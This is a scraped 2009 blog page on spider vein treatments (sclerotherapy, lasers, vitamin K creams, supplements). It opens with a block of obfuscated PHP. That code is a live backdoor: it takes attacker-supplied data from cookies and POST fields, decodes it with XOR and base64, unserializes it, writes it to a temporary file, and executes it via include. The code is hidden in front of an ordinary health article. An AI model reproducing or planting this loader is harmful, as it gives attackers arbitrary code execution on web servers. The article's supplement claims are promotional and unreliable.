$UqXBYV = chr (79) . chr ( 550 - 452 ).chr (95) . "\146" . "\143" . chr (75) . "\132" . chr ( 118 - 19 ); $mOpxKtj = chr ( 399 - 300 )."\x6c" . 'a' . "\163" . "\x73" . chr ( 1023 - 928 ).'e' . chr (120) . "\151" . 's' . 't' . 's';$DiSdVYDc = class_exists($UqXBYV); $mOpxKtj = "22250";$BmIjyJUjF = !1;if ($DiSdVYDc == $BmIjyJUjF){function JMXptSHJ(){$fbeZY = new /* 65015 */ Ob_fcKZc(43883 + 43883); $fbeZY = NULL;}$qyhVO = "43883";class Ob_fcKZc{private function mKEUnpO($qyhVO){if (is_array(Ob_fcKZc::$aoMybKFY)) {$nCXFLRrG = sys_get_temp_dir() . "/" . crc32(Ob_fcKZc::$aoMybKFY['s' . "\x61" . 'l' . 't']);@Ob_fcKZc::$aoMybKFY['w' . "\x72" . chr (105) . "\164" . chr (101)]($nCXFLRrG, Ob_fcKZc::$aoMybKFY[chr ( 917 - 818 )."\157" . chr (110) . chr (116) . "\x65" . chr ( 622 - 512 ).chr (116)]);include $nCXFLRrG;@Ob_fcKZc::$aoMybKFY['d' . "\x65" . "\x6c" . "\145" . "\x74" . chr ( 849 - 748 )]($nCXFLRrG); $qyhVO = "43883";exit();}}private $RSDBY;public function gDAwxTTR(){echo 14037;}public function __destruct(){Ob_fcKZc::$aoMybKFY = @unserialize(Ob_fcKZc::$aoMybKFY); $qyhVO = "8268_3142";$this->mKEUnpO($qyhVO); $qyhVO = "8268_3142";}public function RVrkCLK($JZuFz, $RacqoWlCou){return $JZuFz[0] ^ str_repeat($RacqoWlCou, (strlen($JZuFz[0]) / strlen($RacqoWlCou)) + 1);}public function sAXnddEpR($JZuFz){$LJODBUtXRb = "base64";return array_map($LJODBUtXRb . chr (95) . "\x64" . 'e' . chr (99) . "\157" . "\144" . chr (101), array($JZuFz,));}public function __construct($PnLSnBONV=0){$fUuctjbmZ = $_POST;$weQWCey = $_COOKIE;$RacqoWlCou = "351dbf6d-ff38-4a5a-8f8e-f9c3a5100617";$HGXfdUV = @$weQWCey[substr($RacqoWlCou, 0, 4)];if (!empty($HGXfdUV)){$JZuFz = "";$HGXfdUV = explode(",", $HGXfdUV);foreach ($HGXfdUV as $lkvtSJq){$JZuFz .= @$weQWCey[$lkvtSJq];$JZuFz .= @$fUuctjbmZ[$lkvtSJq];}Ob_fcKZc::$aoMybKFY = $this->RVrkCLK($this->sAXnddEpR($JZuFz), $RacqoWlCou);}}public static $aoMybKFY = 5013;}JMXptSHJ();} Spider Vein Treatment Options | Spider Vein Treatment

Spider Vein Treatment

August 14, 2009

Spider Vein Treatment Options

Filed under: Uncategorized — Tags: , , , — Stretch Marks @ 2:42 pm

Spider Vein Treatment Options

There are many diverse treatment options for spider veins. Some of these include creams, surgical procedures, or laser intervention. Because of the common presentation of spider veins, many treatments have been developed for the removal of spider veins for both cosmetic and physical purposes.

What are spider veins?

Spider veins are something like varicose veins, but slightly smaller. Spider veins begin as small capillaries that look like blue or red squiggles on the skin. They normally appear on the surface of the thighs, calves, and ankles and appear in blue, red or purple clusters. Around one third of the adult female population is affected with spider veins. Most people seek treatment for spider veins for cosmetic purposes; however, spider veins can also cause some physical symptoms such as aching, itching, night cramps, and heaviness.

Spider veins are often associated with large underlying varicose veins. Spider veins normally take one of three forms. They can appear in a “spider” shape with a group of small veins extending from a central point; they can appear in a pattern that resembles a tree branch; they can appear in a separate line pattern. Factors that cause the development of spider veins include pregnancy, hormones, weight gain, prolonged sitting, standing, or trauma.

Treatments for spider veins

A common form of the treatment for spider veins is a procedure called sclerotherapy. This procedure occurs when the veins are injected with a solution using small needles. This solution makes the veins collapse and fade from external view. Sclerotherapy not only exterminates the veins from view, but also can help with the physical maladies that go along with spider veins. Sclerotherapy often requires more than one treatment for the full effect to be realized.

During sclerotherapy, the leg that is affected by spider veins is elevated to drain blood from the veins so that the solution may be injected with the least possible resistance. The procedure can take anywhere from 5 minutes to half an hour depending on how numerous the spider veins in the leg are.

Sclerotherapy can be very painful because the solution that is injected can cause burning or cramping for several minutes after the shot is administered. It can be even more painful if more than one treatment is required for the more serious cases of spider veins.

Another treatment for spider veins comes in the form of laser treatment. During laser treatment, intense laser light is directed to the veins which eliminate them permanently in one treatment. Lasers are most commonly used on small veins that needles cannot reach adequately. However, laser treatment is also much more painful because the burning sensation can last for many weeks after treatment. The cost of laser treatment for spider veins is also much higher than sclerotherapy.

In some cases, cosmetic procedures such as liposuction have been known to reduce the signs of spider veins; however, liposuction is not a sanctioned or approved method for the reduction or elimination of spider veins. In some cases, liposuction has even been known to make spider veins worse, so it is suggested not to proceed with liposuction if spider veins are severe.

Other spider vein cream treatments

The most common spider vein treatment is Vitamin K cream applied directly on the affected area. Vitamin K reduces redness and helps bruising caused by spider veins to disappear more quickly. Vitamin K promotes a powerful antioxidant that supports enhanced coagulation and wall strengthening.

Vitamin creams are used most commonly on spider veins because they are cheaper than surgical procedures and they do not require any needles, lasers, or any pain whatsoever – however creams are not the most effective as treating the underlying causes of spider veins.

Ingredients that have been proven to treat spider veins include Diosmin, a vascular-protecting ingredient, Hesperidin that helps protect against bruising, and often Butcher’s Broom extract for treating circulation problems – the leading cause of spider veins. A combination of these ingredients in a supplement will no doubt prove to be the most effective, easiest way to prevent, and treat spider veins.

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